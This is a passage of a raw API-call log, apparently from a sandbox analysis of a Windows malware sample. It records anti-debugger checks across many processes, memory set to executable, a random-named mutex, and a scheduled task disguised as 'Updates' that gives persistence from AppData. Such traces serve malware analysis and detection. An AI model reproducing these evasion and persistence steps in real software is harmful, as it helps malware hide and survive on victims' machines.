pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.495] GetExitCodeProcess (in: hProcess=0x638, lpExitCode=0x22ad238 | out: lpExitCode=0x22ad238*=0x103) returned 1 [0192.495] CheckRemoteDebuggerPresent (in: hProcess=0x638, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.495] GetExitCodeProcess (in: hProcess=0x63c, lpExitCode=0x22ad2f0 | out: lpExitCode=0x22ad2f0*=0x103) returned 1 [0192.495] CheckRemoteDebuggerPresent (in: hProcess=0x63c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.495] GetExitCodeProcess (in: hProcess=0x640, lpExitCode=0x22ad3a8 | out: lpExitCode=0x22ad3a8*=0x103) returned 1 [0192.496] CheckRemoteDebuggerPresent (in: hProcess=0x640, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.496] GetExitCodeProcess (in: hProcess=0x644, lpExitCode=0x22ad460 | out: lpExitCode=0x22ad460*=0x103) returned 1 [0192.496] CheckRemoteDebuggerPresent (in: hProcess=0x644, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.496] GetExitCodeProcess (in: hProcess=0x648, lpExitCode=0x22ad518 | out: lpExitCode=0x22ad518*=0x103) returned 1 [0192.496] CheckRemoteDebuggerPresent (in: hProcess=0x648, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.496] GetExitCodeProcess (in: hProcess=0x64c, lpExitCode=0x22ad5d0 | out: lpExitCode=0x22ad5d0*=0x103) returned 1 [0192.496] CheckRemoteDebuggerPresent (in: hProcess=0x64c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.496] GetExitCodeProcess (in: hProcess=0x650, lpExitCode=0x22ad688 | out: lpExitCode=0x22ad688*=0x103) returned 1 [0192.496] CheckRemoteDebuggerPresent (in: hProcess=0x650, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.496] GetExitCodeProcess (in: hProcess=0x654, lpExitCode=0x22ad740 | out: lpExitCode=0x22ad740*=0x103) returned 1 [0192.496] CheckRemoteDebuggerPresent (in: hProcess=0x654, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.497] GetExitCodeProcess (in: hProcess=0x658, lpExitCode=0x22ad7f8 | out: lpExitCode=0x22ad7f8*=0x103) returned 1 [0192.497] CheckRemoteDebuggerPresent (in: hProcess=0x658, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.497] GetExitCodeProcess (in: hProcess=0x65c, lpExitCode=0x22ad8b0 | out: lpExitCode=0x22ad8b0*=0x103) returned 1 [0192.497] CheckRemoteDebuggerPresent (in: hProcess=0x65c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.497] GetExitCodeProcess (in: hProcess=0x660, lpExitCode=0x22ad968 | out: lpExitCode=0x22ad968*=0x103) returned 1 [0192.497] CheckRemoteDebuggerPresent (in: hProcess=0x660, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.497] GetExitCodeProcess (in: hProcess=0x664, lpExitCode=0x22ada20 | out: lpExitCode=0x22ada20*=0x103) returned 1 [0192.497] CheckRemoteDebuggerPresent (in: hProcess=0x664, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.497] GetExitCodeProcess (in: hProcess=0x668, lpExitCode=0x22adad8 | out: lpExitCode=0x22adad8*=0x103) returned 1 [0192.497] CheckRemoteDebuggerPresent (in: hProcess=0x668, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.497] GetExitCodeProcess (in: hProcess=0x66c, lpExitCode=0x22adb90 | out: lpExitCode=0x22adb90*=0x103) returned 1 [0192.497] CheckRemoteDebuggerPresent (in: hProcess=0x66c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.498] GetExitCodeProcess (in: hProcess=0x670, lpExitCode=0x22adc48 | out: lpExitCode=0x22adc48*=0x103) returned 1 [0192.498] CheckRemoteDebuggerPresent (in: hProcess=0x670, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.498] GetExitCodeProcess (in: hProcess=0x674, lpExitCode=0x22add00 | out: lpExitCode=0x22add00*=0x103) returned 1 [0192.498] CheckRemoteDebuggerPresent (in: hProcess=0x674, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.498] GetExitCodeProcess (in: hProcess=0x678, lpExitCode=0x22addb8 | out: lpExitCode=0x22addb8*=0x103) returned 1 [0192.498] CheckRemoteDebuggerPresent (in: hProcess=0x678, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.498] GetExitCodeProcess (in: hProcess=0x67c, lpExitCode=0x22ade70 | out: lpExitCode=0x22ade70*=0x103) returned 1 [0192.498] CheckRemoteDebuggerPresent (in: hProcess=0x67c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.498] GetExitCodeProcess (in: hProcess=0x680, lpExitCode=0x22adf28 | out: lpExitCode=0x22adf28*=0x103) returned 1 [0192.498] CheckRemoteDebuggerPresent (in: hProcess=0x680, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.498] GetExitCodeProcess (in: hProcess=0x684, lpExitCode=0x22adfe0 | out: lpExitCode=0x22adfe0*=0x103) returned 1 [0192.499] CheckRemoteDebuggerPresent (in: hProcess=0x684, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.499] GetExitCodeProcess (in: hProcess=0x688, lpExitCode=0x22ae098 | out: lpExitCode=0x22ae098*=0x103) returned 1 [0192.499] CheckRemoteDebuggerPresent (in: hProcess=0x688, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.499] GetExitCodeProcess (in: hProcess=0x68c, lpExitCode=0x22ae150 | out: lpExitCode=0x22ae150*=0x103) returned 1 [0192.499] CheckRemoteDebuggerPresent (in: hProcess=0x68c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.499] GetExitCodeProcess (in: hProcess=0x690, lpExitCode=0x22ae208 | out: lpExitCode=0x22ae208*=0x103) returned 1 [0192.499] CheckRemoteDebuggerPresent (in: hProcess=0x690, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.499] GetExitCodeProcess (in: hProcess=0x694, lpExitCode=0x22ae2c0 | out: lpExitCode=0x22ae2c0*=0x103) returned 1 [0192.499] CheckRemoteDebuggerPresent (in: hProcess=0x694, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.499] GetExitCodeProcess (in: hProcess=0x698, lpExitCode=0x22ae378 | out: lpExitCode=0x22ae378*=0x103) returned 1 [0192.499] CheckRemoteDebuggerPresent (in: hProcess=0x698, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.499] GetExitCodeProcess (in: hProcess=0x69c, lpExitCode=0x22ae430 | out: lpExitCode=0x22ae430*=0x103) returned 1 [0192.500] CheckRemoteDebuggerPresent (in: hProcess=0x69c, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.500] GetExitCodeProcess (in: hProcess=0x6a0, lpExitCode=0x22ae4e8 | out: lpExitCode=0x22ae4e8*=0x103) returned 1 [0192.500] CheckRemoteDebuggerPresent (in: hProcess=0x6a0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.500] GetExitCodeProcess (in: hProcess=0x6a4, lpExitCode=0x22ae5a0 | out: lpExitCode=0x22ae5a0*=0x103) returned 1 [0192.500] CheckRemoteDebuggerPresent (in: hProcess=0x6a4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.500] GetExitCodeProcess (in: hProcess=0x6a8, lpExitCode=0x22ae658 | out: lpExitCode=0x22ae658*=0x103) returned 1 [0192.500] CheckRemoteDebuggerPresent (in: hProcess=0x6a8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.500] GetExitCodeProcess (in: hProcess=0x6ac, lpExitCode=0x22ae710 | out: lpExitCode=0x22ae710*=0x103) returned 1 [0192.500] CheckRemoteDebuggerPresent (in: hProcess=0x6ac, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.500] GetExitCodeProcess (in: hProcess=0x6b0, lpExitCode=0x22ae7c8 | out: lpExitCode=0x22ae7c8*=0x103) returned 1 [0192.500] CheckRemoteDebuggerPresent (in: hProcess=0x6b0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.501] GetExitCodeProcess (in: hProcess=0x6b4, lpExitCode=0x22ae880 | out: lpExitCode=0x22ae880*=0x103) returned 1 [0192.501] CheckRemoteDebuggerPresent (in: hProcess=0x6b4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.501] GetExitCodeProcess (in: hProcess=0x6b8, lpExitCode=0x22ae938 | out: lpExitCode=0x22ae938*=0x103) returned 1 [0192.501] CheckRemoteDebuggerPresent (in: hProcess=0x6b8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.501] GetExitCodeProcess (in: hProcess=0x6bc, lpExitCode=0x22ae9f0 | out: lpExitCode=0x22ae9f0*=0x103) returned 1 [0192.501] CheckRemoteDebuggerPresent (in: hProcess=0x6bc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.501] GetExitCodeProcess (in: hProcess=0x6c0, lpExitCode=0x22aeaa8 | out: lpExitCode=0x22aeaa8*=0x103) returned 1 [0192.501] CheckRemoteDebuggerPresent (in: hProcess=0x6c0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.501] GetExitCodeProcess (in: hProcess=0x6c4, lpExitCode=0x22aeb60 | out: lpExitCode=0x22aeb60*=0x103) returned 1 [0192.501] CheckRemoteDebuggerPresent (in: hProcess=0x6c4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.501] GetExitCodeProcess (in: hProcess=0x6c8, lpExitCode=0x22aec18 | out: lpExitCode=0x22aec18*=0x103) returned 1 [0192.502] CheckRemoteDebuggerPresent (in: hProcess=0x6c8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.502] GetExitCodeProcess (in: hProcess=0x6cc, lpExitCode=0x22aecd0 | out: lpExitCode=0x22aecd0*=0x103) returned 1 [0192.502] CheckRemoteDebuggerPresent (in: hProcess=0x6cc, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.502] GetExitCodeProcess (in: hProcess=0x6d0, lpExitCode=0x22aed88 | out: lpExitCode=0x22aed88*=0x103) returned 1 [0192.502] CheckRemoteDebuggerPresent (in: hProcess=0x6d0, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.502] GetExitCodeProcess (in: hProcess=0x6d4, lpExitCode=0x22aee40 | out: lpExitCode=0x22aee40*=0x103) returned 1 [0192.502] CheckRemoteDebuggerPresent (in: hProcess=0x6d4, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0192.502] GetExitCodeProcess (in: hProcess=0x6d8, lpExitCode=0x22aeef8 | out: lpExitCode=0x22aeef8*=0x103) returned 1 [0192.502] CheckRemoteDebuggerPresent (in: hProcess=0x6d8, pbDebuggerPresent=0x52d530 | out: pbDebuggerPresent=0x52d530) returned 1 [0194.052] VirtualProtect (in: lpAddress=0x5880178, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58801a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58801c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58801f0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x5880218, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e512e, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e5122, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e4800, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e513c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e5160, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e5168, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e516c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e5174, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e5178, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.053] VirtualProtect (in: lpAddress=0x58e517c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e5180, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e5188, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e518c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e5194, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e5198, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e519c, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51a4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51ac, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51bc, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.054] VirtualProtect (in: lpAddress=0x58e51d0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.055] VirtualProtect (in: lpAddress=0x58e51d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.055] VirtualProtect (in: lpAddress=0x58e51dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.055] VirtualProtect (in: lpAddress=0x58e51e0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.055] VirtualProtect (in: lpAddress=0x58e51e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.055] VirtualProtect (in: lpAddress=0x58e51ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x52d6fc | out: lpflOldProtect=0x52d6fc*=0x0) returned 0 [0194.086] CoTaskMemAlloc (cb=0x20c) returned 0x566f9c0 [0194.086] GetEnvironmentVariableW (in: lpName="COR_PROFILER", lpBuffer=0x566f9c0, nSize=0x104 | out: lpBuffer="䄨է渠5\x02") returned 0x0 [0194.086] CoTaskMemFree (pv=0x566f9c0) [0194.086] CoTaskMemAlloc (cb=0x20c) returned 0x566f9c0 [0194.086] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x566f9c0, nSize=0x104 | out: lpBuffer="䄨է渠5\x02") returned 0x0 [0194.086] CoTaskMemFree (pv=0x566f9c0) [0194.091] GetCurrentProcessId () returned 0x718 [0194.091] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x718) returned 0xfbc4 [0194.091] GetExitCodeProcess (in: hProcess=0xfbc4, lpExitCode=0x25245c0 | out: lpExitCode=0x25245c0*=0x103) returned 1 [0194.107] NtQueryInformationProcess (in: ProcessHandle=0xfbc4, ProcessInformationClass=0x0, ProcessInformation=0x52d628, ProcessInformationLength=0x18, ReturnLength=0x52d624 | out: ProcessInformation=0x52d628, ReturnLength=0x52d624) returned 0x0 [0194.117] EnumProcesses (in: lpidProcess=0x2524dfc, cb=0x400, lpcbNeeded=0x52d5a4 | out: lpidProcess=0x2524dfc, lpcbNeeded=0x52d5a4) returned 1 [0194.805] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52da48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0194.808] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="wFeODqeBxkJvqrVbN") returned 0x0 [0194.810] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="wFeODqeBxkJvqrVbN") returned 0xfbc4 [0194.811] CoTaskMemAlloc (cb=0x20c) returned 0x56783d8 [0194.811] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x56783d8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0194.811] CoTaskMemFree (pv=0x56783d8) [0194.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x52da2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0194.811] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x52dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0194.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52df20) returned 1 [0194.812] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), fInfoLevelId=0x0, lpFileInformation=0x52df9c | out: lpFileInformation=0x52df9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x717ab990, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x717ab990, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x7181ddb0, ftLastWriteTime.dwHighDateTime=0x1d6a092, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0194.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52df1c) returned 1 [0194.860] GetCurrentProcess () returned 0xffffffff [0194.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52dee8 | out: TokenHandle=0x52dee8*=0x52c4) returned 1 [0194.863] GetCurrentProcess () returned 0xffffffff [0194.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52debc | out: TokenHandle=0x52debc*=0x34d8) returned 1 [0194.864] GetTokenInformation (in: TokenHandle=0x52c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x52def0 | out: TokenInformation=0x0, ReturnLength=0x52def0) returned 0 [0194.864] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x3c0f38 [0194.864] GetTokenInformation (in: TokenHandle=0x52c4, TokenInformationClass=0x1, TokenInformation=0x3c0f38, TokenInformationLength=0x24, ReturnLength=0x52def0 | out: TokenInformation=0x3c0f38, ReturnLength=0x52def0) returned 1 [0194.866] LocalFree (hMem=0x3c0f38) returned 0x0 [0194.867] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x52de10, DesiredAccess=0x800, PolicyHandle=0x52ddd0 | out: PolicyHandle=0x52ddd0) returned 0x0 [0194.868] LsaLookupSids (in: PolicyHandle=0x3c9ed0, Count=0x1, Sids=0x24ad370*=0x24ad314*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x52ddec, Names=0x52dde0 | out: ReferencedDomains=0x52ddec, Names=0x52dde0) returned 0x0 [0194.869] LsaClose (ObjectHandle=0x3c9ed0) returned 0x0 [0194.869] LsaFreeMemory (Buffer=0x566a610) returned 0x0 [0194.870] LsaFreeMemory (Buffer=0x5672338) returned 0x0 [0194.870] CoTaskMemAlloc (cb=0x20c) returned 0x56783d8 [0194.871] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x56783d8 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0194.871] CoTaskMemFree (pv=0x56783d8) [0194.871] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x52da28, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e [0194.872] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x52da3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x31 [0194.872] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x52d9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x31 [0194.872] CoTaskMemAlloc (cb=0x20c) returned 0x56783d8 [0194.872] GetTempFileNameW (in: lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x56783d8 | out: lpTempFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp40f5.tmp")) returned 0x40f5 [0194.874] CoTaskMemFree (pv=0x56783d8) [0194.876] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp", nBufferLength=0x105, lpBuffer=0x52d8e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp", lpFilePart=0x0) returned 0x3c [0194.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52ddd8) returned 1 [0194.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tmp40f5.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cf8 [0194.877] GetFileType (hFile=0x1cf8) returned 0x1 [0194.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52ddd4) returned 1 [0194.877] GetFileType (hFile=0x1cf8) returned 0x1 [0194.878] WriteFile (in: hFile=0x1cf8, lpBuffer=0x24b1520*, nNumberOfBytesToWrite=0x695, lpNumberOfBytesWritten=0x52de70, lpOverlapped=0x0 | out: lpBuffer=0x24b1520*, lpNumberOfBytesWritten=0x52de70*=0x695, lpOverlapped=0x0) returned 1 [0194.880] CloseHandle (hObject=0x1cf8) returned 1 [0194.881] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x5673320 [0194.881] LocalAlloc (uFlags=0x0, uBytes=0xca) returned 0x37dbb0 [0194.882] ShellExecuteExW (in: pExecInfo=0x24b2880*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x24b2880*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3c7c)) returned 1 [0195.106] LocalFree (hMem=0x5673320) returned 0x0 [0195.106] LocalFree (hMem=0x37dbb0) returned 0x0 [0195.106] GetCurrentProcess () returned 0xffffffff [0195.106] GetCurrentProcess () returned 0xffffffff [0195.106] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3c7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x52ded0, dwDesiredAccess=0x0, 